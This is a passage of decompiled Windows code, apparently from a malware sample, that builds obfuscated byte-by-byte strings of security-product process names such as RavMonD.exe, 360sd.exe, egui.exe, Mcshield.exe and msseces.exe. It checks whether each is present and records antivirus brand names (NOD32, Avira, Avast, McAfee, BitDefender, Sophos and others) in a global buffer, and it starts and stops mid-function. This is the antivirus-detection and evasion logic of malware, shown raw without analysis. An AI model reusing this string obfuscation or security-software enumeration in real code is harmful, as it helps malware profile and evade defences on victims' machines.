				_v323 = 0x58;
				_v322 = 0x50;
				_v321 = 0x2e;
				_v320 = 0x65;
				_v319 = 0x78;
				_v318 = 0x65;
				_v317 = 0;
				_v304 = 0x52;
				_v303 = 0x61;
				_v302 = 0x76;
				_v301 = 0x4d;
				_v300 = 0x6f;
				_v299 = 0x6e;
				_v298 = 0x44;
				_v297 = 0x2e;
				_v296 = 0x65;
				_v295 = 0x78;
				_v294 = 0x65;
				_v293 = 0;
				_v160 = 0x33;
				_v159 = 0x36;
				_v158 = 0x30;
				_v157 = 0x73;
				_v156 = 0x64;
				_v155 = 0x2e;
				_v154 = 0x65;
				_v153 = 0x78;
				_v152 = 0x65;
				_v151 = 0;
				_v136 = 0x4d;
				_v135 = 0x69;
				_v134 = 0x6e;
				_v133 = 0x65;
				_v132 = 0x72;
				_v131 = 0x2e;
				_v130 = 0x65;
				_v129 = 0x78;
				_v128 = 0x65;
				_v127 = 0;
				_v100 = 0x65;
				_v99 = 0x67;
				_v98 = 0x75;
				_v97 = 0x69;
				_v96 = 0x2e;
				_v95 = 0x65;
				_v94 = 0x78;
				_v93 = 0x65;
				_v92 = 0;
				_v352 = 0x6b;
				_v351 = 0x78;
				_v350 = 0x65;
				_v349 = 0x74;
				_v348 = 0x72;
				_v347 = 0x61;
				_v346 = 0x79;
				_v345 = 0x2e;
				_v344 = 0x65;
				_v343 = 0x78;
				_v342 = 0x65;
				_v341 = 0;
				_v400 = 0x54;
				_v399 = 0x4d;
				_v398 = 0x42;
				_v397 = 0x4d;
				_v396 = 0x53;
				_v395 = 0x52;
				_v394 = 0x56;
				_v393 = 0x2e;
				_v392 = 0x65;
				_v391 = 0x78;
				_v390 = 0x65;
				_v389 = 0;
				_v208 = 0x61;
				_v207 = 0x76;
				_v206 = 0x67;
				_v205 = 0x75;
				_v204 = 0x69;
				_v203 = 0x2e;
				_v202 = 0x65;
				_v201 = 0x78;
				_v200 = 0x65;
				_v199 = 0;
				_v316 = 0x61;
				_v315 = 0x73;
				_v314 = 0x68;
				_v313 = 0x44;
				_v312 = 0x69;
				_v311 = 0x73;
				_v310 = 0x70;
				_v309 = 0x2e;
				_v308 = 0x65;
				_v307 = 0x78;
				_v306 = 0x65;
				_v305 = 0;
				_v184 = 0x4d;
				_v183 = 0x50;
				_v182 = 0x4d;
				_v181 = 0x4f;
				_v180 = 0x4e;
				_v179 = 0x2e;
				_v178 = 0x45;
				_v177 = 0x58;
				_v176 = 0x45;
				_v175 = 0;
				_v428 = 0x61;
				_v427 = 0x76;
				_v426 = 0x63;
				_v425 = 0x65;
				_v424 = 0x6e;
				_v423 = 0x74;
				_v422 = 0x65;
				_v421 = 0x72;
				_v420 = 0x2e;
				_v419 = 0x65;
				_v418 = 0x78;
				_v417 = 0x65;
				_v416 = 0;
				_v460 = 0x73;
				_v459 = 0x70;
				_v458 = 0x69;
				_v457 = 0x64;
				_v456 = 0x65;
				_v455 = 0x72;
				_v454 = 0x6e;
				_v453 = 0x74;
				_v452 = 0x2e;
				_v451 = 0x65;
				_v450 = 0x78;
				_v449 = 0x65;
				_v448 = 0;
				_v540 = 0x4d;
				_v539 = 0x63;
				_v538 = 0x73;
				_v537 = 0x68;
				_v536 = 0x69;
				_v535 = 0x65;
				_v534 = 0x6c;
				_v533 = 0x64;
				_v532 = 0x2e;
				_v531 = 0x65;
				_v530 = 0x78;
				_v529 = 0x65;
				_v528 = 0;
				_v492 = 0x66;
				_v491 = 0x2d;
				_v490 = 0x73;
				_v489 = 0x65;
				_v488 = 0x63;
				_v487 = 0x75;
				_v486 = 0x72;
				_v485 = 0x65;
				_v484 = 0x2e;
				_v483 = 0x65;
				_v482 = 0x78;
				_v481 = 0x65;
				_v480 = 0;
				_v340 = 0x61;
				_v339 = 0x72;
				_v338 = 0x63;
				_v337 = 0x61;
				_v336 = 0x76;
				_v335 = 0x69;
				_v334 = 0x72;
				_v333 = 0x2e;
				_v332 = 0x65;
				_v331 = 0x78;
				_v330 = 0x65;
				_v329 = 0;
				_v556 = 0x63;
				_v555 = 0x63;
				_v554 = 0x53;
				_v553 = 0x76;
				_v552 = 0x63;
				_v551 = 0x48;
				_v550 = 0x73;
				_v549 = 0x74;
				_v548 = 0x2e;
				_v547 = 0x65;
				_v546 = 0x78;
				_v545 = 0x65;
				_v544 = 0;
				_v112 = 0x6b;
				_v111 = 0x73;
				_v110 = 0x61;
				_v109 = 0x66;
				_v108 = 0x65;
				_v107 = 0x2e;
				_v106 = 0x65;
				_v105 = 0x78;
				_v104 = 0x65;
				_v103 = 0;
				_v292 = 0x61;
				_v291 = 0x75;
				_v290 = 0x74;
				_v289 = 0x68;
				_v288 = 0x66;
				_v287 = 0x77;
				_v286 = 0x2e;
				_v285 = 0x65;
				_v284 = 0x78;
				_v283 = 0x65;
				_v282 = 0;
				_v256 = 0x76;
				_v255 = 0x73;
				_v254 = 0x73;
				_v253 = 0x65;
				_v252 = 0x72;
				_v251 = 0x76;
				_v250 = 0x2e;
				_v249 = 0x65;
				_v248 = 0x78;
				_v247 = 0x65;
				_v246 = 0;
				_v124 = 0x61;
				_v123 = 0x67;
				_v122 = 0x65;
				_v121 = 0x6e;
				_v120 = 0x74;
				_v119 = 0x2e;
				_v118 = 0x65;
				_v117 = 0x78;
				_v116 = 0x65;
				_v115 = 0;
				_v56 = 0x63;
				_v55 = 0x66;
				_v54 = 0x70;
				_v53 = 0x2e;
				_v52 = 0x65;
				_v51 = 0x78;
				_v50 = 0x65;
				_v49 = 0;
				_v280 = 0x46;
				_v279 = 0x2d;
				_v278 = 0x50;
				_v277 = 0x52;
				_v276 = 0x4f;
				_v275 = 0x54;
				_v274 = 0x2e;
				_v273 = 0x65;
				_v272 = 0x78;
				_v271 = 0x65;
				_v270 = 0;
				_v656 = 0x67;
				_v655 = 0x75;
				_v654 = 0x61;
				_v653 = 0x72;
				_v652 = 0x64;
				_v651 = 0x78;
				_v650 = 0x73;
				_v649 = 0x65;
				_v648 = 0x72;
				_v647 = 0x76;
				_v646 = 0x69;
				_v645 = 0x63;
				_v644 = 0x65;
				_v643 = 0x2e;
				_v642 = 0x65;
				_v641 = 0x78;
				_v640 = 0x65;
				_v639 = 0;
				_v524 = 0x6d;
				_v523 = 0x73;
				_v522 = 0x73;
				_v521 = 0x65;
				_v520 = 0x63;
				_v519 = 0x65;
				_v518 = 0x73;
				_v517 = 0x73;
				_v516 = 0x2e;
				_v515 = 0x65;
				_v514 = 0x78;
				_v513 = 0x65;
				_v512 = 0;
				_v148 = 0x56;
				_v147 = 0x33;
				_v146 = 0x53;
				_v145 = 0x76;
				_v144 = 0x63;
				_v143 = 0x2e;
				_v142 = 0x65;
				_v141 = 0x78;
				_v140 = 0x65;
				_v139 = 0;
				_v244 = 0x72;
				_v243 = 0x65;
				_v242 = 0x6d;
				_v241 = 0x75;
				_v240 = 0x70;
				_v239 = 0x64;
				_v238 = 0x2e;
				_v237 = 0x65;
				_v236 = 0x78;
				_v235 = 0x65;
				_v234 = 0;
				_v172 = 0x61;
				_v171 = 0x6c;
				_v170 = 0x6d;
				_v169 = 0x6f;
				_v168 = 0x6e;
				_v167 = 0x2e;
				_v166 = 0x65;
				_v165 = 0x78;
				_v164 = 0x65;
				_v163 = 0;
				_v588 = 0x41;
				_v587 = 0x50;
				_v586 = 0x41;
				_v585 = 0x53;
				_v584 = 0x53;
				_v583 = 0x65;
				_v582 = 0x72;
				_v581 = 0x76;
				_v580 = 0x2e;
				_v579 = 0x65;
				_v578 = 0x78;
				_v577 = 0x65;
				_v576 = 0;
				_v604 = 0x46;
				_v603 = 0x6f;
				_v602 = 0x72;
				_v601 = 0x74;
				_v600 = 0x69;
				_v599 = 0x54;
				_v598 = 0x72;
				_v597 = 0x61;
				_v596 = 0x79;
				_v595 = 0x2e;
				_v594 = 0x65;
				_v593 = 0x78;
				_v592 = 0x65;
				_v591 = 0;
				_v572 = 0x4e;
				_v571 = 0x56;
				_v570 = 0x43;
				_v569 = 0x53;
				_v568 = 0x63;
				_v567 = 0x68;
				_v566 = 0x65;
				_v565 = 0x64;
				_v564 = 0x2e;
				_v563 = 0x65;
				_v562 = 0x78;
				_v561 = 0x65;
				_v560 = 0;
				_v364 = 0x51;
				_v363 = 0x51;
				_v362 = 0x50;
				_v361 = 0x43;
				_v360 = 0x52;
				_v359 = 0x54;
				_v358 = 0x50;
				_v357 = 0x2e;
				_v356 = 0x65;
				_v355 = 0x78;
				_v354 = 0x65;
				_v353 = 0;
				_v620 = 0x42;
				_v619 = 0x61;
				_v618 = 0x69;
				_v617 = 0x64;
				_v616 = 0x75;
				_v615 = 0x53;
				_v614 = 0x64;
				_v613 = 0x53;
				_v612 = 0x76;
				_v611 = 0x63;
				_v610 = 0x2e;
				_v609 = 0x65;
				_v608 = 0x78;
				_v607 = 0x65;
				_v606 = 0;
				_v40 = 0x71;
				_v39 = 0x71;
				_v38 = 0x2e;
				_v37 = 0x45;
				_v36 = 0x58;
				_v35 = 0x45;
				_v34 = 0;
				_v32 = 0x79;
				_v31 = 0x79;
				_v30 = 0x2e;
				_v29 = 0x65;
				_v28 = 0x78;
				_v27 = 0x65;
				_v26 = 0;
				_v88 = 0x39;
				_v87 = 0x31;
				_v86 = 0x35;
				_v85 = 0x38;
				_v84 = 0x2e;
				_v83 = 0x45;
				_v82 = 0x58;
				_v81 = 0x45;
				_v80 = 0;
				_v680 = 0x43;
				_v679 = 0x61;
				_v678 = 0x6d;
				_v677 = 0x66;
				_v676 = 0x72;
				_v675 = 0x6f;
				_v674 = 0x67;
				_v673 = 0x20;
				_v672 = 0x56;
				_v671 = 0x69;
				_v670 = 0x64;
				_v669 = 0x65;
				_v668 = 0x6f;
				_v667 = 0x20;
				_v666 = 0x43;
				_v665 = 0x68;
				_v664 = 0x61;
				_v663 = 0x74;
				_v662 = 0x2e;
				_v661 = 0x65;
				_v660 = 0x78;
				_v659 = 0x65;
				_v658 = 0;
				_v196 = 0x6d;
				_v195 = 0x73;
				_v194 = 0x74;
				_v193 = 0x73;
				_v192 = 0x63;
				_v191 = 0x2e;
				_v190 = 0x45;
				_v189 = 0x58;
				_v188 = 0x45;
				_v187 = 0;
				_v220 = 0x41;
				_v219 = 0x6c;
				_v218 = 0x69;
				_v217 = 0x49;
				_v216 = 0x4d;
				_v215 = 0x2e;
				_v214 = 0x65;
				_v213 = 0x78;
				_v212 = 0x65;
				_v211 = 0;
				_v388 = 0x44;
				_v387 = 0x55;
				_v386 = 0x42;
				_v385 = 0x72;
				_v384 = 0x75;
				_v383 = 0x74;
				_v382 = 0x65;
				_v381 = 0x2e;
				_v380 = 0x65;
				_v379 = 0x78;
				_v378 = 0x65;
				_v377 = 0;
				_v268 = 0x4e;
				_v267 = 0x73;
				_v266 = 0x76;
				_v265 = 0x6d;
				_v264 = 0x6f;
				_v263 = 0x6e;
				_v262 = 0x2e;
				_v261 = 0x6e;
				_v260 = 0x70;
				_v259 = 0x63;
				_v258 = 0;
				_v444 = 0x6b;
				_v443 = 0x6e;
				_v442 = 0x73;
				_v441 = 0x64;
				_v440 = 0x74;
				_v439 = 0x72;
				_v438 = 0x61;
				_v437 = 0x79;
				_v436 = 0x2e;
				_v435 = 0x65;
				_v434 = 0x78;
				_v433 = 0x65;
				_v432 = 0;
				_v24 = 0x73;
				_v23 = 0x2e;
				_v22 = 0x65;
				_v21 = 0x78;
				_v20 = 0x65;
				_v19 = 0;
				_v64 = 0x46;
				_v63 = 0x54;
				_v62 = 0x50;
				_v61 = 0x2e;
				_v60 = 0x65;
				_v59 = 0x78;
				_v58 = 0x65;
				_v57 = 0;
				_v636 = 0x53;
				_v635 = 0x65;
				_v634 = 0x72;
				_v633 = 0x76;
				_v632 = 0x55;
				_v631 = 0x44;
				_v630 = 0x61;
				_v629 = 0x65;
				_v628 = 0x6d;
				_v627 = 0x6f;
				_v626 = 0x6e;
				_v625 = 0x2e;
				_v624 = 0x65;
				_v623 = 0x78;
				_v622 = 0x65;
				_v621 = 0;
				_v76 = 0x31;
				_v75 = 0x34;
				_v74 = 0x33;
				_v73 = 0x33;
				_v72 = 0x2e;
				_v71 = 0x65;
				_v70 = 0x78;
				_v69 = 0x65;
				_v68 = 0;
				_v232 = 0x70;
				_v231 = 0x61;
				_v230 = 0x74;
				_v229 = 0x72;
				_v228 = 0x61;
				_v227 = 0x79;
				_v226 = 0x2e;
				_v225 = 0x65;
				_v224 = 0x78;
				_v223 = 0x65;
				_v222 = 0;
				_v476 = 0x63;
				_v475 = 0x63;
				_v474 = 0x53;
				_v473 = 0x65;
				_v472 = 0x74;
				_v471 = 0x4d;
				_v470 = 0x67;
				_v469 = 0x72;
				_v468 = 0x2e;
				_v467 = 0x65;
				_v466 = 0x78;
				_v465 = 0x65;
				_v464 = 0;
				_v508 = 0x51;
				_v507 = 0x55;
				_t1108 = 4;
				_v506 = 0x48;
				_v505 = 0x4c;
				_v504 = 0x50;
				_v503 = 0x53;
				_v502 = 0x56;
				_v501 = 0x43;
				_v500 = 0x2e;
				_v499 = 0x45;
				_v498 = 0x58;
				_v497 = 0x45;
				_v496 = 0;
				_v412 = 0x73;
				_v411 = 0x61;
				_v410 = 0x66;
				_v409 = 0x65;
				_v408 = 0x64;
				_v407 = 0x6f;
				_v406 = 0x67;
				_v405 = 0x2e;
				_v404 = 0x65;
				_v403 = 0x78;
				_v402 = 0x65;
				_v401 = 0;
				memset(0x100275b4, 0, _t1108);
				_t587 =  &_v376; // 0x33
				_t741 = E1000CC7C(_t587); // executed
				_t1111 = _t1110 + 0x10;
				if(_t741 != 0) {
					_t588 =  &_v376; // 0x33
					memset(_t588, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024d94);
					lstrcatA(0x100275b4, 0x10024da0);
				}
				_t589 =  &_v48; // 0x61
				_t743 = E1000CC7C(_t589); // executed
				if(_t743 != 0) {
					_t590 =  &_v48; // 0x61
					memset(_t590, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024da4);
					lstrcatA(0x100275b4, 0x10024db0);
				}
				_t591 =  &_v328; // 0x4b
				_t745 = E1000CC7C(_t591); // executed
				if(_t745 != 0) {
					_t592 =  &_v328; // 0x4b
					memset(_t592, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024db4);
					lstrcatA(0x100275b4, 0x10024dbc);
				}
				_t593 =  &_v304; // 0x52
				_t747 = E1000CC7C(_t593); // executed
				if(_t747 != 0) {
					_t594 =  &_v304; // 0x52
					memset(_t594, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024dc0);
					lstrcatA(0x100275b4, 0x10024dc8);
				}
				_t595 =  &_v160; // 0x33
				_t749 = E1000CC7C(_t595); // executed
				if(_t749 != 0) {
					_t596 =  &_v160; // 0x33
					memset(_t596, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024dcc);
					lstrcatA(0x100275b4, 0x10024dd4);
				}
				_t597 =  &_v136; // 0x4d
				_t751 = E1000CC7C(_t597); // executed
				if(_t751 != 0) {
					_t598 =  &_v136; // 0x4d
					memset(_t598, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024dd8);
					lstrcatA(0x100275b4, 0x10024de4);
				}
				_t599 =  &_v100; // 0x65
				_t753 = E1000CC7C(_t599); // executed
				if(_t753 != 0) {
					_t600 =  &_v100; // 0x65
					memset(_t600, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "NOD32");
					lstrcatA(0x100275b4, 0x10024df0);
				}
				_t601 =  &_v352; // 0x6b
				_t755 = E1000CC7C(_t601); // executed
				if(_t755 != 0) {
					_t602 =  &_v352; // 0x6b
					memset(_t602, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024df4);
					lstrcatA(0x100275b4, 0x10024e00);
				}
				_t603 =  &_v184; // 0x4d
				_t757 = E1000CC7C(_t603); // executed
				if(_t757 != 0) {
					_t604 =  &_v184; // 0x4d
					memset(_t604, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024e04);
					lstrcatA(0x100275b4, 0x10024e0c);
				}
				_t605 =  &_v400; // 0x54
				_t759 = E1000CC7C(_t605); // executed
				if(_t759 != 0) {
					_t606 =  &_v400; // 0x54
					memset(_t606, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024e10);
					lstrcatA(0x100275b4, 0x10024e18);
				}
				_t607 =  &_v428; // 0x61
				_t761 = E1000CC7C(_t607); // executed
				if(_t761 != 0) {
					_t608 =  &_v428; // 0x61
					memset(_t608, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Avira");
					lstrcatA(0x100275b4, 0x10024e24);
				}
				_t609 =  &_v316; // 0x61
				_t763 = E1000CC7C(_t609); // executed
				if(_t763 != 0) {
					_t610 =  &_v316; // 0x61
					memset(_t610, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Avast");
					lstrcatA(0x100275b4, 0x10024e30);
				}
				_t611 =  &_v460; // 0x73
				_t765 = E1000CC7C(_t611); // executed
				if(_t765 != 0) {
					_t612 =  &_v460; // 0x73
					memset(_t612, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Dr.WEB");
					lstrcatA(0x100275b4, " ");
				}
				_t613 =  &_v540; // 0x4d
				_t767 = E1000CC7C(_t613); // executed
				if(_t767 != 0) {
					_t614 =  &_v540; // 0x4d
					memset(_t614, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "McAfee");
					lstrcatA(0x100275b4, " ");
				}
				_t615 =  &_v492; // 0x66
				_t769 = E1000CC7C(_t615); // executed
				if(_t769 != 0) {
					_t616 =  &_v492; // 0x66
					_v16 = 0x46;
					_v15 = 0x2d;
					_v14 = 0x73;
					_v13 = 0x65;
					_v12 = 0x63;
					_v11 = 0x75;
					_v10 = 0x72;
					_v9 = 0x65;
					_v8 = 0;
					memset(_t616, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4,  &_v16);
					lstrcatA(0x100275b4, " ");
				}
				_t627 =  &_v112; // 0x6b
				_t771 = E1000CC7C(_t627); // executed
				if(_t771 != 0) {
					_t628 =  &_v112; // 0x6b
					memset(_t628, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024e50);
					lstrcatA(0x100275b4, 0x10024e5c);
				}
				_t629 =  &_v340; // 0x61
				_t773 = E1000CC7C(_t629); // executed
				if(_t773 != 0) {
					_t630 =  &_v340; // 0x61
					memset(_t630, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Arcavir");
					lstrcatA(0x100275b4, " ");
				}
				_t631 =  &_v556; // 0x63
				_t775 = E1000CC7C(_t631); // executed
				if(_t775 != 0) {
					_t632 =  &_v556; // 0x63
					memset(_t632, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024e6c);
					lstrcatA(0x100275b4, 0x10024e74);
				}
				_t633 =  &_v292; // 0x61
				_t777 = E1000CC7C(_t633); // executed
				if(_t777 != 0) {
					_t634 =  &_v292; // 0x61
					memset(_t634, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Authentium");
					lstrcatA(0x100275b4, " ");
				}
				_t635 =  &_v208; // 0x61
				_t779 = E1000CC7C(_t635); // executed
				if(_t779 != 0) {
					_t636 =  &_v208; // 0x61
					memset(_t636, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "AVG");
					lstrcatA(0x100275b4, " ");
				}
				_t637 =  &_v256; // 0x76
				_t781 = E1000CC7C(_t637); // executed
				if(_t781 != 0) {
					_t638 =  &_v256; // 0x76
					memset(_t638, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "BitDefender");
					lstrcatA(0x100275b4, " ");
				}
				_t639 =  &_v124; // 0x61
				_t783 = E1000CC7C(_t639); // executed
				if(_t783 != 0) {
					_t640 =  &_v124; // 0x61
					memset(_t640, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024ea0);
					lstrcatA(0x100275b4, 0x10024eac);
				}
				_t641 =  &_v56; // 0x63
				_t785 = E1000CC7C(_t641); // executed
				if(_t785 != 0) {
					_t642 =  &_v56; // 0x63
					_v16 = 0x43;
					_v15 = 0x6f;
					_v14 = 0x6d;
					_v13 = 0x6f;
					_v12 = 0x64;
					_v11 = 0x6f;
					_v10 = 0;
					memset(_t642, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					_t650 =  &_v16; // 0x43
					lstrcatA(0x100275b4, _t650);
					lstrcatA(0x100275b4, 0x10024eb0);
				}
				_t651 =  &_v280; // 0x46
				_t787 = E1000CC7C(_t651); // executed
				if(_t787 != 0) {
					_t652 =  &_v280; // 0x46
					_v16 = 0x46;
					_v15 = 0x2d;
					_v14 = 0x50;
					_v13 = 0x52;
					_v12 = 0x4f;
					_v11 = 0x54;
					_v10 = 0;
					memset(_t652, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					_t660 =  &_v16; // 0x46
					lstrcatA(0x100275b4, _t660);
					lstrcatA(0x100275b4, 0x10024eb4);
				}
				_t661 =  &_v656; // 0x67
				_t789 = E1000CC7C(_t661); // executed
				if(_t789 != 0) {
					_t662 =  &_v656; // 0x67
					_v16 = 0x49;
					_v15 = 0x6b;
					_v14 = 0x61;
					_v13 = 0x72;
					_v12 = 0x75;
					_v11 = 0x73;
					_v10 = 0;
					memset(_t662, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					_t670 =  &_v16; // 0x49
					lstrcatA(0x100275b4, _t670);
					lstrcatA(0x100275b4, 0x10024eb8);
				}
				_t671 =  &_v524; // 0x6d
				_t791 = E1000CC7C(_t671); // executed
				if(_t791 != 0) {
					_t672 =  &_v524; // 0x6d
					memset(_t672, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "MSE");
					lstrcatA(0x100275b4, 0x10024ec0);
				}
				_t673 =  &_v148; // 0x56
				_t793 = E1000CC7C(_t673); // executed
				if(_t793 != 0) {
					_t674 =  &_v148; // 0x56
					memset(_t674, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024ec4);
					lstrcatA(0x100275b4, 0x10024ed0);
				}
				_t675 =  &_v244; // 0x72
				_t795 = E1000CC7C(_t675); // executed
				if(_t795 != 0) {
					_t676 =  &_v244; // 0x72
					memset(_t676, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024ed4);
					lstrcatA(0x100275b4, 0x10024ee0);
				}
				_t677 =  &_v172; // 0x61
				_t797 = E1000CC7C(_t677); // executed
				if(_t797 != 0) {
					_t678 =  &_v172; // 0x61
					_v16 = 0x53;
					_v15 = 0x6f;
					_v14 = 0x70;
					_v13 = 0x68;
					_v12 = 0x6f;
					_v11 = 0x73;
					_v10 = 0;
					memset(_t678, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					_t686 =  &_v16; // 0x53
					lstrcatA(0x100275b4, _t686);
					lstrcatA(0x100275b4, 0x10024ee4);
				}
				_t687 =  &_v588; // 0x41
				_t799 = E1000CC7C(_t687); // executed
				if(_t799 != 0) {
					_t688 =  &_v588; // 0x41
					memset(_t688, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Sunbelt");
					lstrcatA(0x100275b4, " ");
				}
				_t689 =  &_v604; // 0x46
				_t801 = E1000CC7C(_t689); // executed
				if(_t801 != 0) {
					_t690 =  &_v604; // 0x46
					memset(_t690, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024ef4);
					lstrcatA(0x100275b4, 0x10024efc);
				}
				_t691 =  &_v572; // 0x4e
				_t803 = E1000CC7C(_t691); // executed
				if(_t803 != 0) {
					_t692 =  &_v572; // 0x4e
					_v16 = 0x4e;
					_v15 = 0x6f;
					_v14 = 0x72;
					_v13 = 0x6d;
					_v12 = 0x61;
					_v11 = 0x6e;
					_v10 = 0;
					memset(_t692, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					_t700 =  &_v16; // 0x4e
					lstrcatA(0x100275b4, _t700);
					lstrcatA(0x100275b4, 0x10024f00);
				}
				_t701 =  &_v364; // 0x51
				_t805 = E1000CC7C(_t701); // executed
				if(_t805 != 0) {
					_t702 =  &_v364; // 0x51
					memset(_t702, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f04);
					lstrcatA(0x100275b4, 0x10024f0c);
				}
				_t703 =  &_v620; // 0x42
				_t807 = E1000CC7C(_t703); // executed
				if(_t807 != 0) {
					_t704 =  &_v620; // 0x42
					memset(_t704, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f10);
					lstrcatA(0x100275b4, 0x10024f1c);
				}
				_t705 =  &_v40; // 0x71
				_t809 = E1000CC7C(_t705); // executed
				if(_t809 != 0) {
					_t706 =  &_v40; // 0x71
					memset(_t706, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f20);
					lstrcatA(0x100275b4, 0x10024f24);
				}
				_t707 =  &_v32; // 0x79
				_t811 = E1000CC7C(_t707); // executed
				if(_t811 != 0) {
					_t708 =  &_v32; // 0x79
					memset(_t708, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f28);
					lstrcatA(0x100275b4, 0x10024f2c);
				}
				_t709 =  &_v88; // 0x39
				_t813 = E1000CC7C(_t709); // executed
				if(_t813 != 0) {
					_t710 =  &_v88; // 0x39
					memset(_t710, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "9158");
					lstrcatA(0x100275b4, 0x10024f38);
				}
				_t711 =  &_v680; // 0x43
				_t815 = E1000CC7C(_t711); // executed
				if(_t815 != 0) {
					_t712 =  &_v680; // 0x43
					memset(_t712, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "CVC");
					lstrcatA(0x100275b4, 0x10024f40);
				}
				_t713 =  &_v196; // 0x6d
				_t817 = E1000CC7C(_t713); // executed
				if(_t817 != 0) {
					_t714 =  &_v196; // 0x6d
					memset(_t714, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f44);
					lstrcatA(0x100275b4, 0x10024f50);
				}
				_t715 =  &_v220; // 0x41
				_t819 = E1000CC7C(_t715); // executed
				if(_t819 != 0) {
					_t716 =  &_v220; // 0x41
					memset(_t716, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f54);
					lstrcatA(0x100275b4, 0x10024f60);
				}
				_t717 =  &_v388; // 0x44
				_t821 = E1000CC7C(_t717); // executed
				if(_t821 != 0) {
					_t718 =  &_v388; // 0x44
					memset(_t718, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "DUB");
					lstrcatA(0x100275b4, 0x10024f68);
				}
				_t719 =  &_v268; // 0x4e
				_t823 = E1000CC7C(_t719); // executed
				if(_t823 != 0) {
					_t720 =  &_v268; // 0x4e
					memset(_t720, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, "Naver");
					lstrcatA(0x100275b4, 0x10024f74);
				}
				_t721 =  &_v444; // 0x6b
				_t825 = E1000CC7C(_t721); // executed
				if(_t825 != 0) {
					_t722 =  &_v444; // 0x6b
					memset(_t722, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f78);
					lstrcatA(0x100275b4, 0x10024f84);
				}
				_t723 =  &_v24; // 0x73
				_t827 = E1000CC7C(_t723); // executed
				if(_t827 != 0) {
					_t724 =  &_v24; // 0x73
					memset(_t724, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f88);
					lstrcatA(0x100275b4, 0x10024f90);
				}
				_t725 =  &_v636; // 0x53
				_t829 = E1000CC7C(_t725); // executed
				if(_t829 != 0) {
					_t726 =  &_v636; // 0x53
					memset(_t726, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024f94);
					lstrcatA(0x100275b4, 0x10024f9c);
				}
				_t727 =  &_v76; // 0x31
				_t831 = E1000CC7C(_t727); // executed
				if(_t831 != 0) {
					_t728 =  &_v76; // 0x31
					memset(_t728, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024fa0);
					lstrcatA(0x100275b4, 0x10024fac);
				}
				_t729 =  &_v64; // 0x46
				_t833 = E1000CC7C(_t729); // executed
				if(_t833 != 0) {
					_t730 =  &_v64; // 0x46
					memset(_t730, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024fb0);
					lstrcatA(0x100275b4, 0x10024fb8);
				}
				_t731 =  &_v232; // 0x70
				_t835 = E1000CC7C(_t731); // executed
				if(_t835 != 0) {
					_t732 =  &_v232; // 0x70
					memset(_t732, 0, _t1108);
					_t1111 = _t1111 + 0xc;
					lstrcatA(0x100275b4, 0x10024fbc);
					lstrcatA(0x100275b4, 0x10024fc4);
				}
				_t733 =  &_v476; // 0x63
				_t837 = E1000CC7C(_t733); // executed
				if(_t837 != 0) {
